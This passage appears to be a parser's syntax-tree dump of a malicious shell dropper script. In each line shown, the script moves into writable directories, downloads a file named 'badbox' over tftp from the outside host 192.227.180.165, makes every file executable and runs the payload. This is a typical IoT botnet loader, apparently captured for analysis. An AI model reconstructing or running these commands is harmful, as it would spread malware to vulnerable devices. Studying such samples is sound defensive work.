    WordNode(lineno=15, pos=(1675, 1690), word='fjdfdfhfgdhfgdj'),
    RedirectNode(lineno=15, output=
      WordNode(lineno=15, pos=(1692, 1698), word='badbox'), pos=(1691, 1698), type='>'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1698, 1699)),
  CommandNode(lineno=15, pos=(1699, 1709), parts=[
    WordNode(lineno=15, pos=(1699, 1704), word='chmod'),
    WordNode(lineno=15, pos=(1705, 1707), word='+x'),
    WordNode(lineno=15, pos=(1708, 1709), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1709, 1710)),
  CommandNode(lineno=15, pos=(1710, 1718), parts=[
    WordNode(lineno=15, pos=(1710, 1718), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1719, 1872), parts=[
  CommandNode(lineno=16, pos=(1719, 1726), parts=[
    WordNode(lineno=16, pos=(1719, 1721), word='cd'),
    WordNode(lineno=16, pos=(1722, 1726), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1727, 1729)),
  CommandNode(lineno=16, pos=(1730, 1741), parts=[
    WordNode(lineno=16, pos=(1730, 1732), word='cd'),
    WordNode(lineno=16, pos=(1733, 1741), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1742, 1744)),
  CommandNode(lineno=16, pos=(1745, 1752), parts=[
    WordNode(lineno=16, pos=(1745, 1747), word='cd'),
    WordNode(lineno=16, pos=(1748, 1752), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1753, 1755)),
  CommandNode(lineno=16, pos=(1756, 1764), parts=[
    WordNode(lineno=16, pos=(1756, 1758), word='cd'),
    WordNode(lineno=16, pos=(1759, 1764), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1765, 1767)),
  CommandNode(lineno=16, pos=(1768, 1772), parts=[
    WordNode(lineno=16, pos=(1768, 1770), word='cd'),
    WordNode(lineno=16, pos=(1771, 1772), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1772, 1773)),
  CommandNode(lineno=16, pos=(1774, 1820), parts=[
    WordNode(lineno=16, pos=(1774, 1778), word='tftp'),
    WordNode(lineno=16, pos=(1779, 1781), word='-r'),
    WordNode(lineno=16, pos=(1782, 1801), word='dfjdjgfjdfjfgfgfhhd'),
    WordNode(lineno=16, pos=(1802, 1804), word='-g'),
    WordNode(lineno=16, pos=(1805, 1820), word='192.227.180.165'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1820, 1821)),
  CommandNode(lineno=16, pos=(1821, 1852), parts=[
    WordNode(lineno=16, pos=(1821, 1824), word='cat'),
    WordNode(lineno=16, pos=(1825, 1844), word='dfjdjgfjdfjfgfgfhhd'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1846, 1852), word='badbox'), pos=(1845, 1852), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1852, 1853)),
  CommandNode(lineno=16, pos=(1853, 1863), parts=[
    WordNode(lineno=16, pos=(1853, 1858), word='chmod'),
    WordNode(lineno=16, pos=(1859, 1861), word='+x'),
    WordNode(lineno=16, pos=(1862, 1863), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1863, 1864)),
  CommandNode(lineno=16, pos=(1864, 1872), parts=[
    WordNode(lineno=16, pos=(1864, 1872), word='./badbox'),
  ]),
])
